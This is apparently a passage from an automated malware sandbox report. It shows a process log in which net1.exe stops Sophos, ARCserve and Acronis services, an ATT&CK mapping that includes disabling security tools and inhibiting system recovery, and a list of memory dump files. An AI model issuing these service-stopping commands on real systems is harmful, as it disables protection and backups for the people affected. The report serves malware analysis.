C:\Windows\system32\net1 stop sophos /y
1⤵
PID:5876

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:5868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:5884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:5860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:5852

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:188

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4392

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:184

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1312-233-0x0000013A7D368000-0x0000013A7D369000-memory.dmp

Filesize
4KB

Download
memory/1312-214-0x0000013A7D366000-0x0000013A7D368000-memory.dmp

Filesize
8KB

Download
memory/1312-198-0x0000013A7D360000-0x0000013A7D362000-memory.dmp

Filesize
8KB

Download
memory/1312-202-0x0000013A7D363000-0x0000013A7D365000-memory.dmp

Filesize
8KB

Download
memory/1524-212-0x000001DE54346000-0x000001DE54348000-memory.dmp

Filesize
8KB

Download
memory/1524-234-0x000001DE54348000-0x000001DE54349000-memory.dmp

Filesize
4KB

Download
memory/1524-189-0x000001DE54340000-0x000001DE54342000-memory.dmp

Filesize
8KB

Download
memory/1524-191-0x000001DE54343000-0x000001DE54345000-memory.dmp

Filesize
8KB

Download
memory/1744-133-0x00000211C4A30000-0x00000211C4A32000-memory.dmp

Filesize
8KB

Download
memory/1744-126-0x00000211C4AE0000-0x00000211C4AE1000-memory.dmp

Filesize
4KB

Download
memory/1744-129-0x00000211DD280000-0x00000211DD281000-memory.dmp

Filesize
4KB

Download
memory/1744-134-0x00000211C4A33000-0x00000211C4A35000-memory.dmp

Filesize
8KB

Download
memory/1744-135-0x00000211C4A36000-0x00000211C4A38000-memory.dmp

Filesize
8KB

Download
memory/1872-210-0x0000029032CD3000-0x0000029032CD5000-memory.dmp

Filesize
8KB

Download
memory/1872-235-0x0000029032CD8000-0x0000029032CD9000-memory.dmp

Filesize
4KB

Download
memory/1872-207-0x0000029032CD0000-0x0000029032CD2000-memory.dmp

Filesize
8KB

Download
memory/1872-216-0x0000029032CD6000-0x0000029032CD8000-memory.dmp

Filesize
8KB

Download
memory/2860-217-0x00000262D5E26000-0x00000262D5E28000-memory.dmp

Filesize
8KB

Download
memory/2860-196-0x00000262D5E23000-0x00000262D5E25000-memory.dmp

Filesize
8KB

Download
memory/2860-241-0x00000262D5E28000-0x00000262D5E29000-memory.dmp

Filesize
4KB

Download
memory/2860-193-0x00000262D5E20000-0x00000262D5E22000-memory.dmp

Filesize
8KB

Download
memory/3972-219-0x00000166E0196000-0x00000166E0198000-memory.dmp

Filesize
8KB

Download
memory/3972-236-0x00000166E0198000-0x00000166E0199000-memory.dmp

Filesize
4KB

Download
memory/3972-205-0x00000166E0190000-0x00000166E0192000-memory.dmp

Filesize
8KB

Download
memory/3972-206-0x00000166E0193000-0x00000166E0195000-memory.dmp

Filesize
8KB

Download
memory/4016-119-0x000000001B650000-0x000000001B652000-memory.dmp

Filesize
8KB

Download
memory/4016-117-0x0000000000A00000-0x0000000000A01000-memory.dmp

Filesize
4KB

Download
memory/4124-240-0x0000018D9FC88000-0x0000018D9FC89000-memory.dmp

Filesize
4KB

Download
memory/4124-220-0x0000018D9FC86000-0x0000018D9FC88000-memory.dmp

Filesize
8KB

Download
memory/4124-201-0x0000018D9FC83000-0x0000018D9FC85000-memory.dmp

Filesize
8KB

Download
memory/4124-199-0x0000018D9FC80000-0x0000018D9FC82000-memory.dmp

Filesize
8KB

Download
memory/4156-229-0x000002AEC6273000-0x000002AEC6275000-memory.dmp

Filesize
8KB

Download
memory/4156-239-0x000002AEC6276000-0x000002AEC6278000-memory.dmp

Filesize
8KB

Download
memory/4156-250-0x000002AEC6278000-0x000002AEC6279000-memory.dmp

Filesize
4KB

Download
memory/4156-228-0x000002AEC6270000-0x000002AEC6272000-memory.dmp

Filesize
8KB

Download
memory/4188-247-0x0000020E9B198000-0x0000020E9B199000-memory.dmp

Filesize
4KB

Download
memory/4188-230-0x0000020E9B196000-0x0000020E9B198000-memory.dmp

Filesize
8KB

Download
memory/4188-203-0x0000020E9B190000-0x0000020E9B192000-memory.dmp

Filesize
8KB

Download
memory/4188-204-0x0000020E9B193000-0x0000020E9B195000-memory.dmp

Filesize
8KB

Download
memory/4292-208-0x000002CB2B290000-0x000002CB2B292000-memory.dmp

Filesize
8KB

Download
memory/4292-231-0x000002CB2B296000-0x000002CB2B298000-memory.dmp

Filesize
8KB

Download
memory/4292-246-0x000002CB2B298000-0x000002CB2B299000-memory.dmp

Filesize
4KB

Download
memory/4292-209-0x000002CB2B293000-0x000002CB2B295000-memory.dmp

Filesize
8KB

Download
memory/4392-244-0x0000028EA0718000-0x0000028EA0719000-memory.dmp

Filesize
4KB

Download
memory/4392-213-0x0000028EA0713000-0x0000028EA0715000-memory.dmp

Filesize
8KB

Download
memory/4392-211-0x0000028EA0710000-0x0000028EA0712000-memory.dmp

Filesize
8KB

Download
memory/4392-232-0x0000028EA0716000-0x0000028EA0718000-memory.dmp

Filesize
8KB

Download
memory/4876-221-0x000001B97AFC0000-0x000001B97AFC2000-memory.dmp

Filesize
8KB

Download
memory/4876-248-0x000001B97AFC8000-0x000001B97AFC9000-memory.dmp

Filesize
4KB

Download
memory/4876-237-0x000001B97AFC6000-0x000001B97AFC8000-memory.dmp

Filesize
8KB

Download
memory/4876-222-0x000001B97AFC3000-0x000001B97AFC5000-memory.dmp

Filesize
8KB

Download
memory/4932-238-0x000001981ADF6000-0x000001981ADF8000-memory.dmp

Filesize
8KB

Download
memory/4932-224-0x000001981ADF0000-0x000001981ADF2000-memory.dmp

Filesize
8KB

Download
memory/4932-249-0x000001981ADF8000-0x000001981ADF9000-memory.dmp

Filesize
4KB

Download
memory/4932-225-0x000001981ADF3000-0x000001981ADF5000-memory.dmp

Filesize
8KB

Download